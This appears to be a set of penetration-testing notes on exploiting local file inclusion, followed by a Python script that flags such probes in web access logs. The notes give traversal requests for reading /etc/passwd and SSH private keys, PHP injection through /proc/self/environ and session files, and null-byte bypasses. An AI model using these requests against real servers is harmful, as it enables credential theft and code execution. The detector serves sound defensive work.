Good to add to the tool-belt when you're looking to see which sensitive files exist and are readable once you've found an LFI vulnerability. It also includes a mode (ICE-Breaker) that scans a potential target using an encoded path-traversal list, which helps with LFI discovery.
nikto ..might report one (if it is a known issue)
python fi-cyberscan.py -t http://$IP/cyber.php?page= -m1
fimap -u $IP ..in kali
whoami / home directory / SSH:
whoami:
/proc/self/status ..shows the process Uid/Gid (e.g. 100:101); match them against /etc/passwd
Home directory:
/etc/passwd ..learn the home path
/var/lib/asterisk/ ..check the home path
/var/lib/asterisk/.ssh/id_rsa ..private SSH key here?
Code execution with 'environ'
If you can read 'environ', you might have code execution
Burp > Repeater > /proc/self/environ
graph.php?lang=../../../proc/self/environ%00&module=Accounts
User-Agent: <?php echo "hello"; ?>
Go (send the request)
Fuzzing LFI
Burp > Intercept > Send to Intruder > Positions
Clear & Add: $attack$
graph.php?lang=../../../etc/passwd%00&module=Accounts
graph.php?lang=../../../$attack$%00&module=Accounts
$attack$ marks the fuzz position
Payloads > Load > burp-fuzz >
LFI-LogFileCheck.txt
LFI-InterestingFiles.txt
Start Attack
Sort by Length ..to spot the responses that differ
RFI from LFI (PHP session files)
If you can locate the 'session' cookies,
you may be able to inject them via Burp Repeater to get execution
cd vtiger/ ..if you have the source
grep -R phpinfo\(\)
maybe: Image/Canvas/PDF.php ..if we can access it?
Find where the session is saved:
ex: /tmp/sess_xyz123
Repeater:
graph.php?lang=../../../tmp/sess_xyz123%00&module=Accounts
Might give you execution
Adding a NULL BYTE strips the appended suffix (on older systems)
Works well in Perl and older versions of PHP (fixed since PHP 5.3.4)
Scenario: the server automatically appends .png to your page parameter
http://abc.so/file.php?file=photo .. ok
http://abc.so/file.php?file=photo.png .. nothing
http://abc.so/file.php?file=photo.png%00 .. ok
http://abc.so/file.php?file=file.php%00 .. ok
http://abc.so/file.php?file=/../../etc/passwd%00 .. win
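The flip side of the notes above is spotting these requests in your own logs. This added example (not from the original notes or any tool they mention) percent-decodes the request URL from constructed access-log lines and flags the indicators used throughout this page: traversal sequences, the %00 null byte, /proc/self/environ, /etc/passwd, and PHP session files. The log lines and IPs are made up for the demo.

```python
import re
from urllib.parse import unquote

# Constructed sample access-log lines (not from the original page), common log format.
SAMPLE_LOG = """\
10.0.0.5 - - [10/Oct/2023:13:55:36 +0000] "GET /graph.php?lang=en&module=Accounts HTTP/1.1" 200 512
10.0.0.9 - - [10/Oct/2023:13:55:40 +0000] "GET /graph.php?lang=../../../etc/passwd%00&module=Accounts HTTP/1.1" 200 2048
10.0.0.9 - - [10/Oct/2023:13:55:41 +0000] "GET /graph.php?lang=..%2f..%2f..%2fproc%2fself%2fenviron%00&module=Accounts HTTP/1.1" 200 1337
10.0.0.9 - - [10/Oct/2023:13:55:42 +0000] "GET /graph.php?lang=../../../tmp/sess_xyz123%00&module=Accounts HTTP/1.1" 200 77
10.0.0.7 - - [10/Oct/2023:13:56:00 +0000] "GET /file.php?file=photo HTTP/1.1" 200 4096
"""

REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<url>\S+) HTTP/[\d.]+"')

# Indicators taken from the techniques in the notes above; matched on the fully decoded URL.
INDICATORS = {
    "traversal": re.compile(r"(\.\./|\.\.\\)"),
    "null_byte": re.compile(r"\x00"),
    "proc_environ": re.compile(r"/proc/self/environ"),
    "proc_status": re.compile(r"/proc/self/status"),
    "etc_passwd": re.compile(r"/etc/passwd"),
    "php_session": re.compile(r"/sess_[A-Za-z0-9]+"),
    "ssh_key": re.compile(r"/\.ssh/"),
}

def decode_url(url):
    """Percent-decode until stable so double-encoded payloads (%252e) are seen too."""
    prev = None
    while prev != url:
        prev, url = url, unquote(url)
    return url

def analyse_line(line):
    """Return the indicator names matched by one log line (empty list if clean)."""
    m = REQUEST_RE.search(line)
    if not m:
        return []
    url = decode_url(m.group("url"))
    return [name for name, rx in INDICATORS.items() if rx.search(url)]

def scan_log(text):
    """Return {client_ip: set of indicators} for clients with at least one hit."""
    hits = {}
    for line in text.splitlines():
        names = analyse_line(line)
        if names:
            ip = line.split(" ", 1)[0]
            hits.setdefault(ip, set()).update(names)
    return hits
```

Running scan_log(SAMPLE_LOG) attributes all three LFI probes to 10.0.0.9 while the benign lines from the other hosts produce no hits; the same logic drops into a log shipper or a SIEM rule.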